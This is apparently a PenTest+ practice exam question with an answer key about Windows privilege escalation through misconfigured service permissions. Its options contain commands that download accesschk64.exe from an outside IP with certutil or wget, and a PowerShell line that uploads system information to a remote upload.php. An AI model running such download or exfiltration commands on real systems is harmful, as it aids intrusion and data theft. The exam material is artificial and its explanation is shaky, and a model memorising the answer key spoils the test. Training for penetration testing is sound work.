CompTIA PenTest+ (PT1-002) — Question 76

A penetration tester has obtained a low-privilege shell on a Windows server with a default configuration and now wants to explore the ability to exploit misconfigured service permissions. Which of the following commands would help the tester START this process?

Answer options

• A. certutil ג€"urlcache ג€"split ג€"f http://192.168.2.124/windows-binaries/accesschk64.exe
• B. powershell (New-Object System.Net.WebClient).UploadFile('http://192.168.2.124/upload.php', 'systeminfo.txt')
• C. schtasks /query /fo LIST /v | find /I ג€Next Run Time:ג€
• D. wget http://192.168.2.124/windows-binaries/accesschk64.exe ג€"O accesschk64.exe

Correct answer: A

Explanation

The correct answer is A because the certutil command is used to download files, which is essential for accessing the accesschk64.exe tool that helps in checking service permissions. Options B and D involve uploading and downloading files but do not specifically address the exploitation of service permissions. Option C is related to querying scheduled tasks and does not assist in the exploitation process.